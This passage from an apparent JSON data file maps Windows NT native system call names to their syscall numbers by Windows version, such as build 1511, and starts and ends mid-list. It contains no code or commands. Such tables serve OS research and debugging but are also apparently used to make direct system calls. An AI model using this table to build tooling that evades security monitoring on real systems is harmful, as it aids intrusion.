\"NtQueryDirectoryFile\": 53, \"NtQuerySystemInformation\": 54, \"NtOpenSection\": 55, \"NtQueryTimer\": 56, \"NtFsControlFile\": 57, \"NtWriteVirtualMemory\": 58, \"NtCloseObjectAuditAlarm\": 59, \"NtDuplicateObject\": 60, \"NtQueryAttributesFile\": 61, \"NtClearEvent\": 62, \"NtReadVirtualMemory\": 63, \"NtOpenEvent\": 64, \"NtAdjustPrivilegesToken\": 65, \"NtDuplicateToken\": 66, \"NtContinue\": 67, \"NtQueryDefaultUILanguage\": 68, \"NtQueueApcThread\": 69, \"NtYieldExecution\": 70, \"NtAddAtom\": 71, \"NtCreateEvent\": 72, \"NtQueryVolumeInformationFile\": 73, \"NtCreateSection\": 74, \"NtFlushBuffersFile\": 75, \"NtApphelpCacheControl\": 76, \"NtCreateProcessEx\": 77, \"NtCreateThread\": 78, \"NtIsProcessInJob\": 79, \"NtProtectVirtualMemory\": 80, \"NtQuerySection\": 81, \"NtResumeThread\": 82, \"NtTerminateThread\": 83, \"NtReadRequestData\": 84, \"NtCreateFile\": 85, \"NtQueryEvent\": 86, \"NtWriteRequestData\": 87, \"NtOpenDirectoryObject\": 88, \"NtAccessCheckByTypeAndAuditAlarm\": 89, \"NtQuerySystemTime\": 90, \"NtWaitForMultipleObjects\": 91, \"NtSetInformationObject\": 92, \"NtCancelIoFile\": 93, \"NtTraceEvent\": 94, \"NtPowerInformation\": 95, \"NtSetValueKey\": 96, \"NtCancelTimer\": 97, \"NtSetTimer\": 98, \"NtAccessCheckByType\": 99, \"NtAccessCheckByTypeResultList\": 100, \"NtAccessCheckByTypeResultListAndAuditAlarm\": 101, \"NtAccessCheckByTypeResultListAndAuditAlarmByHandle\": 102, \"NtAddAtomEx\": 103, \"NtAddBootEntry\": 104, \"NtAddDriverEntry\": 105, \"NtAdjustGroupsToken\": 106, \"NtAdjustTokenClaimsAndDeviceGroups\": 107, \"NtAlertResumeThread\": 108, \"NtAlertThread\": 109, \"NtAlertThreadByThreadId\": 110, \"NtAllocateLocallyUniqueId\": 111, \"NtAllocateReserveObject\": 112, \"NtAllocateUserPhysicalPages\": 113, \"NtAllocateUuids\": 114, \"NtAlpcAcceptConnectPort\": 115, \"NtAlpcCancelMessage\": 116, \"NtAlpcConnectPort\": 117, \"NtAlpcConnectPortEx\": 118, \"NtAlpcCreatePort\": 119, \"NtAlpcCreatePortSection\": 120, \"NtAlpcCreateResourceReserve\": 121, \"NtAlpcCreateSectionView\": 122, \"NtAlpcCreateSecurityContext\": 123, \"NtAlpcDeletePortSection\": 124, \"NtAlpcDeleteResourceReserve\": 125, \"NtAlpcDeleteSectionView\": 126, \"NtAlpcDeleteSecurityContext\": 127, \"NtAlpcDisconnectPort\": 128, \"NtAlpcImpersonateClientContainerOfPort\": 129, \"NtAlpcImpersonateClientOfPort\": 130, \"NtAlpcOpenSenderProcess\": 131, \"NtAlpcOpenSenderThread\": 132, \"NtAlpcQueryInformation\": 133, \"NtAlpcQueryInformationMessage\": 134, \"NtAlpcRevokeSecurityContext\": 135, \"NtAlpcSendWaitReceivePort\": 136, \"NtAlpcSetInformation\": 137, \"NtAreMappedFilesTheSame\": 138, \"NtAssignProcessToJobObject\": 139, \"NtAssociateWaitCompletionPacket\": 140, \"NtCancelIoFileEx\": 141, \"NtCancelSynchronousIoFile\": 142, \"NtCancelTimer2\": 143, \"NtCancelWaitCompletionPacket\": 144, \"NtCommitComplete\": 145, \"NtCommitEnlistment\": 146, \"NtCommitTransaction\": 147, \"NtCompactKeys\": 148, \"NtCompareObjects\": 149, \"NtCompareTokens\": 150, \"NtCompleteConnectPort\": 151, \"NtCompressKey\": 152, \"NtConnectPort\": 153, \"NtCreateDebugObject\": 154, \"NtCreateDirectoryObject\": 155, \"NtCreateDirectoryObjectEx\": 156, \"NtCreateEnlistment\": 157, \"NtCreateEventPair\": 158, \"NtCreateIRTimer\": 159, \"NtCreateIoCompletion\": 160, \"NtCreateJobObject\": 161, \"NtCreateJobSet\": 162, \"NtCreateKeyTransacted\": 163, \"NtCreateKeyedEvent\": 164, \"NtCreateLowBoxToken\": 165, \"NtCreateMailslotFile\": 166, \"NtCreateMutant\": 167, \"NtCreateNamedPipeFile\": 168, \"NtCreatePagingFile\": 169, \"NtCreatePartition\": 170, \"NtCreatePort\": 171, \"NtCreatePrivateNamespace\": 172, \"NtCreateProcess\": 173, \"NtCreateProfile\": 174, \"NtCreateProfileEx\": 175, \"NtCreateResourceManager\": 176, \"NtCreateSemaphore\": 177, \"NtCreateSymbolicLinkObject\": 178, \"NtCreateThreadEx\": 179, \"NtCreateTimer\": 180, \"NtCreateTimer2\": 181, \"NtCreateToken\": 182, \"NtCreateTokenEx\": 183, \"NtCreateTransaction\": 184, \"NtCreateTransactionManager\": 185, \"NtCreateUserProcess\": 186, \"NtCreateWaitCompletionPacket\": 187, \"NtCreateWaitablePort\": 188, \"NtCreateWnfStateName\": 189, \"NtCreateWorkerFactory\": 190, \"NtDebugActiveProcess\": 191, \"NtDebugContinue\": 192, \"NtDeleteAtom\": 193, \"NtDeleteBootEntry\": 194, \"NtDeleteDriverEntry\": 195, \"NtDeleteFile\": 196, \"NtDeleteKey\": 197, \"NtDeleteObjectAuditAlarm\": 198, \"NtDeletePrivateNamespace\": 199, \"NtDeleteValueKey\": 200, \"NtDeleteWnfStateData\": 201, \"NtDeleteWnfStateName\": 202, \"NtDisableLastKnownGood\": 203, \"NtDisplayString\": 204, \"NtDrawText\": 205, \"NtEnableLastKnownGood\": 206, \"NtEnumerateBootEntries\": 207, \"NtEnumerateDriverEntries\": 208, \"NtEnumerateSystemEnvironmentValuesEx\": 209, \"NtEnumerateTransactionObject\": 210, \"NtExtendSection\": 211, \"NtFilterBootOption\": 212, \"NtFilterToken\": 213, \"NtFilterTokenEx\": 214, \"NtFlushBuffersFileEx\": 215, \"NtFlushInstallUILanguage\": 216, \"NtFlushInstructionCache\": 217, \"NtFlushKey\": 218, \"NtFlushProcessWriteBuffers\": 219, \"NtFlushVirtualMemory\": 220, \"NtFlushWriteBuffer\": 221, \"NtFreeUserPhysicalPages\": 222, \"NtFreezeRegistry\": 223, \"NtFreezeTransactions\": 224, \"NtGetCachedSigningLevel\": 225, \"NtGetCompleteWnfStateSubscription\": 226, \"NtGetContextThread\": 227, \"NtGetCurrentProcessorNumber\": 228, \"NtGetCurrentProcessorNumberEx\": 229, \"NtGetDevicePowerState\": 230, \"NtGetMUIRegistryInfo\": 231, \"NtGetNextProcess\": 232, \"NtGetNextThread\": 233, \"NtGetNlsSectionPtr\": 234, \"NtGetNotificationResourceManager\": 235, \"NtGetWriteWatch\": 236, \"NtImpersonateAnonymousToken\": 237, \"NtImpersonateThread\": 238, \"NtInitializeNlsFiles\": 239, \"NtInitializeRegistry\": 240, \"NtInitiatePowerAction\": 241, \"NtIsSystemResumeAutomatic\": 242, \"NtIsUILanguageComitted\": 243, \"NtListenPort\": 244, \"NtLoadDriver\": 245, \"NtLoadKey\": 246, \"NtLoadKey2\": 247, \"NtLoadKeyEx\": 248, \"NtLockFile\": 249, \"NtLockProductActivationKeys\": 250, \"NtLockRegistryKey\": 251, \"NtLockVirtualMemory\": 252, \"NtMakePermanentObject\": 253, \"NtMakeTemporaryObject\": 254, \"NtManagePartition\": 255, \"NtMapCMFModule\": 256, \"NtMapUserPhysicalPages\": 257, \"NtModifyBootEntry\": 258, \"NtModifyDriverEntry\": 259, \"NtNotifyChangeDirectoryFile\": 260, \"NtNotifyChangeKey\": 261, \"NtNotifyChangeMultipleKeys\": 262, \"NtNotifyChangeSession\": 263, \"NtOpenEnlistment\": 264, \"NtOpenEventPair\": 265, \"NtOpenIoCompletion\": 266, \"NtOpenJobObject\": 267, \"NtOpenKeyEx\": 268, \"NtOpenKeyTransacted\": 269, \"NtOpenKeyTransactedEx\": 270, \"NtOpenKeyedEvent\": 271, \"NtOpenMutant\": 272, \"NtOpenObjectAuditAlarm\": 273, \"NtOpenPartition\": 274, \"NtOpenPrivateNamespace\": 275, \"NtOpenProcessToken\": 276, \"NtOpenResourceManager\": 277, \"NtOpenSemaphore\": 278, \"NtOpenSession\": 279, \"NtOpenSymbolicLinkObject\": 280, \"NtOpenThread\": 281, \"NtOpenTimer\": 282, \"NtOpenTransaction\": 283, \"NtOpenTransactionManager\": 284, \"NtPlugPlayControl\": 285, \"NtPrePrepareComplete\": 286, \"NtPrePrepareEnlistment\": 287, \"NtPrepareComplete\": 288, \"NtPrepareEnlistment\": 289, \"NtPrivilegeCheck\": 290, \"NtPrivilegeObjectAuditAlarm\": 291, \"NtPrivilegedServiceAuditAlarm\": 292, \"NtPropagationComplete\": 293, \"NtPropagationFailed\": 294, \"NtPulseEvent\": 295, \"NtQueryBootEntryOrder\": 296, \"NtQueryBootOptions\": 297, \"NtQueryDebugFilterState\": 298, \"NtQueryDirectoryObject\": 299, \"NtQueryDriverEntryOrder\": 300, \"NtQueryEaFile\": 301, \"NtQueryFullAttributesFile\": 302, \"NtQueryInformationAtom\": 303, \"NtQueryInformationEnlistment\": 304, \"NtQueryInformationJobObject\": 305, \"NtQueryInformationPort\": 306, \"NtQueryInformationResourceManager\": 307, \"NtQueryInformationTransaction\": 308, \"NtQueryInformationTransactionManager\": 309, \"NtQueryInformationWorkerFactory\": 310, \"NtQueryInstallUILanguage\": 311, \"NtQueryIntervalProfile\": 312, \"NtQueryIoCompletion\": 313, \"NtQueryLicenseValue\": 314, \"NtQueryMultipleValueKey\": 315, \"NtQueryMutant\": 316, \"NtQueryOpenSubKeys\": 317, \"NtQueryOpenSubKeysEx\": 318, \"NtQueryPortInformationProcess\": 319, \"NtQueryQuotaInformationFile\": 320, \"NtQuerySecurityAttributesToken\": 321, \"NtQuerySecurityObject\": 322, \"NtQuerySemaphore\": 323, \"NtQuerySymbolicLinkObject\": 324, \"NtQuerySystemEnvironmentValue\": 325, \"NtQuerySystemEnvironmentValueEx\": 326, \"NtQuerySystemInformationEx\": 327, \"NtQueryTimerResolution\": 328, \"NtQueryWnfStateData\": 329, \"NtQueryWnfStateNameInformation\": 330, \"NtQueueApcThreadEx\": 331, \"NtRaiseException\": 332, \"NtRaiseHardError\": 333, \"NtReadOnlyEnlistment\": 334, \"NtRecoverEnlistment\": 335, \"NtRecoverResourceManager\": 336, \"NtRecoverTransactionManager\": 337, \"NtRegisterProtocolAddressInformation\": 338, \"NtRegisterThreadTerminatePort\": 339, \"NtReleaseKeyedEvent\": 340, \"NtReleaseWorkerFactoryWorker\": 341, \"NtRemoveIoCompletionEx\": 342, \"NtRemoveProcessDebug\": 343, \"NtRenameKey\": 344, \"NtRenameTransactionManager\": 345, \"NtReplaceKey\": 346, \"NtReplacePartitionUnit\": 347, \"NtReplyWaitReplyPort\": 348, \"NtRequestPort\": 349, \"NtResetEvent\": 350, \"NtResetWriteWatch\": 351, \"NtRestoreKey\": 352, \"NtResumeProcess\": 353, \"NtRevertContainerImpersonation\": 354, \"NtRollbackComplete\": 355, \"NtRollbackEnlistment\": 356, \"NtRollbackTransaction\": 357, \"NtRollforwardTransactionManager\": 358, \"NtSaveKey\": 359, \"NtSaveKeyEx\": 360, \"NtSaveMergedKeys\": 361, \"NtSecureConnectPort\": 362, \"NtSerializeBoot\": 363, \"NtSetBootEntryOrder\": 364, \"NtSetBootOptions\": 365, \"NtSetCachedSigningLevel\": 366, \"NtSetContextThread\": 367, \"NtSetDebugFilterState\": 368, \"NtSetDefaultHardErrorPort\": 369, \"NtSetDefaultLocale\": 370, \"NtSetDefaultUILanguage\": 371, \"NtSetDriverEntryOrder\": 372, \"NtSetEaFile\": 373, \"NtSetHighEventPair\": 374, \"NtSetHighWaitLowEventPair\": 375, \"NtSetIRTimer\": 376, \"NtSetInformationDebugObject\": 377, \"NtSetInformationEnlistment\": 378, \"NtSetInformationJobObject\": 379, \"NtSetInformationKey\": 380, \"NtSetInformationResourceManager\": 381, \"NtSetInformationSymbolicLink\": 382, \"NtSetInformationToken\": 383, \"NtSetInformationTransaction\": 384, \"NtSetInformationTransactionManager\": 385, \"NtSetInformationVirtualMemory\": 386, \"NtSetInformationWorkerFactory\": 387, \"NtSetIntervalProfile\": 388, \"NtSetIoCompletion\": 389, \"NtSetIoCompletionEx\": 390, \"NtSetLdtEntries\": 391, \"NtSetLowEventPair\": 392, \"NtSetLowWaitHighEventPair\": 393, \"NtSetQuotaInformationFile\": 394, \"NtSetSecurityObject\": 395, \"NtSetSystemEnvironmentValue\": 396, \"NtSetSystemEnvironmentValueEx\": 397, \"NtSetSystemInformation\": 398, \"NtSetSystemPowerState\": 399, \"NtSetSystemTime\": 400, \"NtSetThreadExecutionState\": 401, \"NtSetTimer2\": 402, \"NtSetTimerEx\": 403, \"NtSetTimerResolution\": 404, \"NtSetUuidSeed\": 405, \"NtSetVolumeInformationFile\": 406, \"NtSetWnfProcessNotificationEvent\": 407, \"NtShutdownSystem\": 408, \"NtShutdownWorkerFactory\": 409, \"NtSignalAndWaitForSingleObject\": 410, \"NtSinglePhaseReject\": 411, \"NtStartProfile\": 412, \"NtStopProfile\": 413, \"NtSubscribeWnfStateChange\": 414, \"NtSuspendProcess\": 415, \"NtSuspendThread\": 416, \"NtSystemDebugControl\": 417, \"NtTerminateJobObject\": 418, \"NtTestAlert\": 419, \"NtThawRegistry\": 420, \"NtThawTransactions\": 421, \"NtTraceControl\": 422, \"NtTranslateFilePath\": 423, \"NtUmsThreadYield\": 424, \"NtUnloadDriver\": 425, \"NtUnloadKey\": 426, \"NtUnloadKey2\": 427, \"NtUnloadKeyEx\": 428, \"NtUnlockFile\": 429, \"NtUnlockVirtualMemory\": 430, \"NtUnmapViewOfSectionEx\": 431, \"NtUnsubscribeWnfStateChange\": 432, \"NtUpdateWnfStateData\": 433, \"NtVdmControl\": 434, \"NtWaitForAlertByThreadId\": 435, \"NtWaitForDebugEvent\": 436, \"NtWaitForKeyedEvent\": 437, \"NtWaitForWorkViaWorkerFactory\": 438, \"NtWaitHighEventPair\": 439, \"NtWaitLowEventPair\": 440}, \"1511\": {\"NtAccessCheck\": 0, \"NtWorkerFactoryWorkerReady\": 1, \"NtAcceptConnectPort\": 2, \"NtMapUserPhysicalPagesScatter\": 3, \"NtWaitForSingleObject\": 4, \"NtCallbackReturn\": 5, \"NtReadFile\": 6, \"NtDeviceIoControlFile\": 7, \"NtWriteFile\": 8, \"NtRemoveIoCompletion\": 9, \"NtReleaseSemaphore\": 10, \"NtReplyWaitReceivePort\": 11, \"NtReplyPort\": 12, \"NtSetInformationThread\": 13, \"NtSetEvent\": 14, \"NtClose\": 15, \"NtQueryObject\": 16, \"NtQueryInformationFile\": 17, \"NtOpenKey\": 18, \"NtEnumerateValueKey\": 19, \"NtFindAtom\": 20, \"NtQueryDefaultLocale\": 21, \"NtQueryKey\": 22, \"NtQueryValueKey\": 23, \"NtAllocateVirtualMemory\": 24, \"NtQueryInformationProcess\": 25, \"NtWaitForMultipleObjects32\": 26, \"NtWriteFileGather\": 27, \"NtSetInformationProcess\": 28, \"NtCreateKey\": 29, \"NtFreeVirtualMemory\": 30, \"NtImpersonateClientOfPort\": 31, \"NtReleaseMutant\": 32, \"NtQueryInformationToken\": 33, \"NtRequestWaitReplyPort\": 34, \"NtQueryVirtualMemory\": 35, \"NtOpenThreadToken\": 36, \"NtQueryInformationThread\": 37, \"NtOpenProcess\": 38, \"NtSetInformationFile\": 39, \"NtMapViewOfSection\": 40, \"NtAccessCheckAndAuditAlarm\": 41, \"NtUnmapViewOfSection\": 42, \"NtReplyWaitReceivePortEx\": 43, \"NtTerminateProcess\": 44, \"NtSetEventBoostPriority\": 45, \"NtReadFileScatter\": 46, \"NtOpenThreadTokenEx\": 47, \"NtOpenProcessTokenEx\": 48, \"NtQueryPerformanceCounter\": 49, \"NtEnumerateKey\": 50, \"NtOpenFile\": 51, \"NtDelayExecution\": 52, \"NtQueryDirectoryFile\": 53, \"NtQuerySystemInformation\": 54, \"NtOpenSection\": 55, \"NtQueryTimer\": 56, \"NtFsControlFile\": 57, \"NtWriteVirtualMemory\": 58, \"NtCloseObjectAuditAlarm\": 59, \"NtDuplicateObject\": 60, \"NtQueryAttributesFile\": 61, \"NtClearEvent\": 62, \"NtReadVirtualMemory\": 63, \"NtOpenEvent\": 64, \"NtAdjustPrivilegesToken\": 65, \"NtDuplicateToken\": 66, \"NtContinue\": 67, \"NtQueryDefaultUILanguage\": 68, \"NtQueueApcThread\": 69, \"NtYieldExecution\": 70, \"NtAddAtom\": 71, \"NtCreateEvent\": 72, \"NtQueryVolumeInformationFile\": 73, \"NtCreateSection\": 74, \"NtFlushBuffersFile\": 75, \"NtApphelpCacheControl\": 76, \"NtCreateProcessEx\": 77, \"NtCreateThread\": 78, \"NtIsProcessInJob\": 79, \"NtProtectVirtualMemory\": 80, \"NtQuerySection\": 81, \"NtResumeThread\": 82, \"NtTerminateThread\": 83, \"NtReadRequestData\": 84, \"NtCreateFile\": 85, \"NtQueryEvent\": 86, \"NtWriteRequestData\": 87, \"NtOpenDirectoryObject\": 88, \"NtAccessCheckByTypeAndAuditAlarm\": 89, \"NtQuerySystemTime\": 90, \"NtWaitForMultipleObjects\": 91, \"NtSetInformationObject\": 92, \"NtCancelIoFile\": 93, \"NtTraceEvent\": 94, \"NtPowerInformation\": 95, \"NtSetValueKey\": 96, \"NtCancelTimer\": 97, \"NtSetTimer\": 98, \"NtAccessCheckByType\": 99, \"NtAccessCheckByTypeResultList\": 100, \"NtAccessCheckByTypeResultListAndAuditAlarm\": 101, \"NtAccessCheckByTypeResultListAndAuditAlarmByHandle\": 102, \"NtAddAtomEx\": 103, \"NtAddBootEntry\": 104, \"NtAddDriverEntry\": 105, \"NtAdjustGroupsToken\": 106, \"NtAdjustTokenClaimsAndDeviceGroups\": 107, \"NtAlertResumeThread\": 108, \"NtAlertThread\": 109, \"NtAlertThreadByThreadId\": 110, \"NtAllocateLocallyUniqueId\": 111, \"NtAllocateReserveObject\": 112, \"NtAllocateUserPhysicalPages\": 113, \"NtAllocateUuids\": 114, \"NtAlpcAcceptConnectPort\": 115, \"NtAlpcCancelMessage\": 116, \"NtAlpcConnectPort\": 117, \"NtAlpcConnectPortEx\": 118, \"NtAlpcCreatePort\": 119, \"NtAlpcCreatePortSection\": 120, \"NtAlpcCreateResourceReserve\": 121, \"NtAlpcCreateSectionView\": 122, \"NtAlpcCreateSecurityContext\": 123, \"NtAlpcDeletePortSection\": 124, \"NtAlpcDeleteResourceReserve\": 125, \"NtAlpcDeleteSectionView\": 126, \"NtAlpcDeleteSecurityContext\": 127, \"NtAlpcDisconnectPort\": 128, \"NtAlpcImpersonateClientContainerOfPort\": 129, \"NtAlpcImpersonateClientOfPort\": 130, \"NtAlpcOpenSenderProcess\": 131, \"NtAlpcOpenSenderThread\": 132, \"NtAlpcQueryInformation\": 133, \"NtAlpcQueryInformationMessage\": 134, \"NtAlpcRevokeSecurityContext\": 135, \"NtAlpcSendWaitReceivePort\": 136, \"NtAlpcSetInformation\": 137, \"NtAreMappedFilesTheSame\": 138, \"NtAssignProcessToJobObject\": 139, \"NtAssociateWaitCompletionPacket\": 140, \"NtCancelIoFileEx\": 141, \"NtCancelSynchronousIoFile\": 142, \"NtCancelTimer2\": 143, \"NtCancelWaitCompletionPacket\": 144, \"NtCommitComplete\": 145, \"NtCommitEnlistment\": 146, \"NtCommitTransaction\": 147, \"NtCompactKeys\": 148, \"NtCompareObjects\": 149, \"NtCompareTokens\": 150, \"NtCompleteConnectPort\": 151, \"NtCompressKey\": 152, \"NtConnectPort\": 153, \"NtCreateDebugObject\": 154, \"NtCreateDirectoryObject\": 155, \"NtCreateDirectoryObjectEx\": 156, \"NtCreateEnclave\": 157, \"NtCreateEnlistment\": 158, \"NtCreateEventPair\": 159, \"NtCreateIRTimer\": 160, \"NtCreateIoCompletion\": 161, \"NtCreateJobObject\": 162, \"NtCreateJobSet\": 163, \"NtCreateKeyTransacted\": 164, \"NtCreateKeyedEvent\": 165, \"NtCreateLowBoxToken\": 166, \"NtCreateMailslotFile\": 167, \"NtCreateMutant\": 168, \"NtCreateNamedPipeFile\": 169, \"NtCreatePagingFile\": 170, \"NtCreatePartition\": 171, \"NtCreatePort\": 172, \"NtCreatePrivateNamespace\": 173, \"NtCreateProcess\": 174, \"NtCreateProfile\": 175, \"NtCreateProfileEx\": 176, \"NtCreateResourceManager\": 177, \"NtCreateSemaphore\": 178, \"NtCreateSymbolicLinkObject\": 179, \"NtCreateThreadEx\": 180, \"NtCreateTimer\": 181, \"NtCreateTimer2\": 182, \"NtCreateToken\": 183, \"NtCreateTokenEx\": 184, \"NtCreateTransaction\": 185, \"NtCreateTransactionManager\": 186, \"NtCreateUserProcess\": 187, \"NtCreateWaitCompletionPacket\": 188, \"NtCreateWaitablePort\": 189, \"NtCreateWnfStateName\": 190, \"NtCreateWorkerFactory\": 191, \"NtDebugActiveProcess\": 192, \"NtDebugContinue\": 193, \"NtDeleteAtom\": 194, \"NtDeleteBootEntry\": 195, \"NtDeleteDriverEntry\": 196, \"NtDeleteFile\": 197, \"NtDeleteKey\": 198, \"NtDeleteObjectAuditAlarm\": 199, \"NtDeletePrivateNamespace\": 200, \"NtDeleteValueKey\": 201, \"NtDeleteWnfStateData\": 202, \"NtDeleteWnfStateName\": 203, \"NtDisableLastKnownGood\": 204, \"NtDisplayString\": 205, \"NtDrawText\": 206, \"NtEnableLastKnownGood\": 207, \"NtEnumerateBootEntries\": 208, \"NtEnumerateDriverEntries\": 209, \"NtEnumerateSystemEnvironmentValuesEx\": 210, \"NtEnumerateTransactionObject\": 211, \"NtExtendSection\": 212, \"NtFilterBootOption\": 213, \"NtFilterToken\": 214, \"NtFilterTokenEx\": 215, \"NtFlushBuffersFileEx\": 216, \"NtFlushInstallUILanguage\": 217, \"NtFlushInstructionCache\": 218, \"NtFlushKey\": 219, \"NtFlushProcessWriteBuffers\": 220, \"NtFlushVirtualMemory\": 221, \"NtFlushWriteBuffer\": 222, \"NtFreeUserPhysicalPages\": 223, \"NtFreezeRegistry\": 224, \"NtFreezeTransactions\": 225, \"NtGetCachedSigningLevel\": 226, \"NtGetCompleteWnfStateSubscription\": 227, \"NtGetContextThread\": 228, \"NtGetCurrentProcessorNumber\": 229, \"NtGetCurrentProcessorNumberEx\": 230, \"NtGetDevicePowerState\": 231, \"NtGetMUIRegistryInfo\": 232, \"NtGetNextProcess\": 233, \"NtGetNextThread\": 234, \"NtGetNlsSectionPtr\": 235, \"NtGetNotificationResourceManager\": 236, \"NtGetWriteWatch\": 237, \"NtImpersonateAnonymousToken\": 238, \"NtImpersonateThread\": 239, \"NtInitializeEnclave\": 240, \"NtInitializeNlsFiles\": 241, \"NtInitializeRegistry\": 242, \"NtInitiatePowerAction\": 243, \"NtIsSystemResumeAutomatic\": 244, \"NtIsUILanguageComitted\": 245, \"NtListenPort\": 246, \"NtLoadDriver\": 247, \"NtLoadEnclaveData\": 248, \"NtLoadKey\": 249, \"NtLoadKey2\": 250, \"NtLoadKeyEx\": 251, \"NtLockFile\": 252, \"NtLockProductActivationKeys\": 253, \"NtLockRegistryKey\": 254, \"NtLockVirtualMemory\": 255, \"NtMakePermanentObject\": 256, \"NtMakeTemporaryObject\": 257, \"NtManagePartition\": 258, \"NtMapCMFModule\": 259, \"NtMapUserPhysicalPages\": 260, \"NtModifyBootEntry\": 261, \"NtModifyDriverEntry\": 262, \"NtNotifyChangeDirectoryFile\": 263, \"NtNotifyChangeKey\": 264, \"NtNotifyChangeMultipleKeys\": 265, \"NtNotifyChangeSession\": 266, \"NtOpenEnlistment\": 267, \"NtOpenEventPair\": 268, \"NtOpenIoCompletion\": 269, \"NtOpenJobObject\": 270, \"NtOpenKeyEx\": 271, \"NtOpenKeyTransacted\": 272, \"NtOpenKeyTransactedEx\": 273, \"NtOpenKeyedEvent\": 274, \"NtOpenMutant\": 275, \"NtOpenObjectAuditAlarm\": 276, \"NtOpenPartition\": 277, \"NtOpenPrivateNamespace\": 278, \"NtOpenProcessToken\": 279, \"NtOpenResourceManager\": 280, \"NtOpenSemaphore\": 281, \"NtOpenSession\": 282, \"NtOpenSymbolicLinkObject\": 283, \"NtOpenThread\": 284, \"NtOpenTimer\": 285, \"NtOpenTransaction\": 286, \"NtOpenTransactionManager\": 287, \"NtPlugPlayControl\": 288, \"NtPrePrepareComplete\": 289, \"NtPrePrepareEnlistment\": 290, \"NtPrepareComplete\": 291, \"NtPrepareEnlistment\": 292, \"NtPrivilegeCheck\": 293, \"NtPrivilegeObjectAuditAlarm\": 294, \"NtPrivilegedServiceAuditAlarm\": 295, \"NtPropagationComplete\": 296, \"NtPropagationFailed\": 297, \"NtPulseEvent\": 298, \"NtQueryBootEntryOrder\": 299, \"NtQueryBootOptions\": 300, \"NtQueryDebugFilterState\": 301, \"NtQueryDirectoryObject\": 302, \"NtQueryDriverEntryOrder\": 303, \"NtQueryEaFile\": 304, \"NtQueryFullAttributesFile\": 305, \"NtQueryInformationAtom\": 306, \"NtQueryInformationEnlistment\": 307, \"NtQueryInformationJobObject\": 308, \"NtQueryInformationPort\": 309, \"NtQueryInformationResourceManager\": 310, \"NtQueryInformationTransaction\": 311, \"NtQueryInformationTransactionManager\": 312, \"NtQueryInformationWorkerFactory\": 313, \"NtQueryInstallUILanguage\": 314, \"NtQueryIntervalProfile\": 315, \"NtQueryIoCompletion\": 316, \"NtQueryLicenseValue\": 317, \"NtQueryMultipleValueKey\": 318, \"NtQueryMutant\": 319, \"NtQueryOpenSubKeys\": 320, \"NtQueryOpenSubKeysEx\": 321, \"NtQueryPortInformationProcess\": 322, \"NtQueryQuotaInformationFile\": 323, \"NtQuerySecurityAttributesToken\": 324, \"NtQuerySecurityObject\": 325, \"NtQuerySemaphore\": 326, \"NtQuerySymbolicLinkObject\": 327, \"NtQuerySystemEnvironmentValue\": 328, \"NtQuerySystemEnvironmentValueEx\": 329, \"NtQuerySystemInformationEx\": 330, \"NtQueryTimerResolution\": 331, \"NtQueryWnfStateData\": 332, \"NtQueryWnfStateNameInformation\": 333, \"NtQueueApcThreadEx\": 334, \"NtRaiseException\": 335, \"NtRaiseHardError\": 336, \"NtReadOnlyEnlistment\": 337, \"NtRecoverEnlistment\": 338, \"NtRecoverResourceManager\": 339, \"NtRecoverTransactionManager\": 340, \"NtRegisterProtocolAddressInformation\": 341, \"NtRegisterThreadTerminatePort\": 342, \"NtReleaseKeyedEvent\": 343, \"NtReleaseWorkerFactoryWorker\": 344, \"NtRemoveIoCompletionEx\": 345, \"NtRemoveProcessDebug\": 346, \"NtRenameKey\": 347, \"NtRenameTransactionManager\": 348, \"NtReplaceKey\": 349, \"NtReplacePartitionUnit\": 350, \"NtReplyWaitReplyPort\": 351, \"NtRequestPort\": 352, \"NtResetEvent\": 353, \"NtResetWriteWatch\": 354, \"NtRestoreKey\": 355, \"NtResumeProcess\": 356, \"NtRevertContainerImpersonation\": 357, \"NtRollbackComplete\": 358, \"NtRollbackEnlistment\": 359, \"NtRollbackTransaction\": 360, \"NtRollforwardTransactionManager\": 361, \"NtSaveKey\": 362, \"NtSaveKeyEx\": 363, \"NtSaveMergedKeys\": 364, \"NtSecureConnectPort\": 365, \"NtSerializeBoot\": 366, \"NtSetBootEntryOrder\": 367, \"NtSetBootOptions\": 368, \"NtSetCachedSigningLevel\": 369, \"NtSetContextThread\": 370, \"NtSetDebugFilterState\": 371, \"NtSetDefaultHardErrorPort\": 372, \"NtSetDefaultLocale\": 373, \"NtSetDefaultUILanguage\": 374, \"NtSetDriverEntryOrder\": 375, \"NtSetEaFile\": 376, \"NtSetHighEventPair\": 377, \"NtSetHighWaitLowEventPair\": 378, \"NtSetIRTimer\": 379, \"NtSetInformationDebugObject\": 380, \"NtSetInformationEnlistment\": 381, \"NtSetInformationJobObject\": 382, \"NtSetInformationKey\": 383, \"NtSetInformationResourceManager\": 384, \"NtSetInformationSymbolicLink\": 385, \"NtSetInformationToken\": 386, \"NtSetInformationTransaction\": 387, \"NtSetInformationTransactionManager\": 388, \"NtSetInformationVirtualMemory\": 389, \"NtSetInformationWorkerFactory\": 390, \"NtSetIntervalProfile\": 391, \"NtSetIoCompletion\": 392, \"NtSetIoCompletionEx\": 393, \"NtSetLdtEntries\": 394, \"NtSetLowEventPair\": 395, \"NtSetLowWaitHighEventPair\": 396, \"NtSetQuotaInformationFile\": 397, \"NtSetSecurityObject\": 398, \"NtSetSystemEnvironmentValue\": 399, \"NtSetSystemEnvironmentValueEx\": 400, \"NtSetSystemInformation\": 401, \"NtSetSystemPowerState\": 402, \"NtSetSystemTime\": 403, \"NtSetThreadExecutionState\": 404, \"NtSetTimer2\": 405, \"NtSetTimerEx\": 406, \"NtSetTimerResolution\": 407, \"NtSetUuidSeed\": 408, \"NtSetVolumeInformationFile\": 409, \"NtSetWnfProcessNotificationEvent\": 410, \"NtShutdownSystem\": 411, \"NtShutdownWorkerFactory\": 412, \"NtSignalAndWaitForSingleObject\": 413, \"NtSinglePhaseReject\": 414, \"NtStartProfile\": 415, \"NtStopProfile\": 416, \"NtSubscribeWnfStateChange\": 417, \"NtSuspendProcess\": 418, \"NtSuspendThread\": 419, \"NtSystemDebugControl\": 420, \"NtTerminateJobObject\": 421, \"NtTestAlert\": 422, \"NtThawRegistry\": 423, \"NtThawTransactions\": 424, \"NtTraceControl\": 425, \"NtTranslateFilePath\": 426, \"NtUmsThreadYield\": 427, \"NtUnloadDriver\": 428, \"NtUnloadKey\": 429, \"NtUnloadKey2\": 430, \"NtUnloadKeyEx\": 431, \"NtUnlockFile\": 432, \"NtUnlockVirtualMemory\": 433, \"NtUnmapViewOfSectionEx\": 434, \"NtUnsubscribeWnfStateChange\": 435, \"NtUpdateWnfStateData\": 436, \"NtVdmControl\": 437, 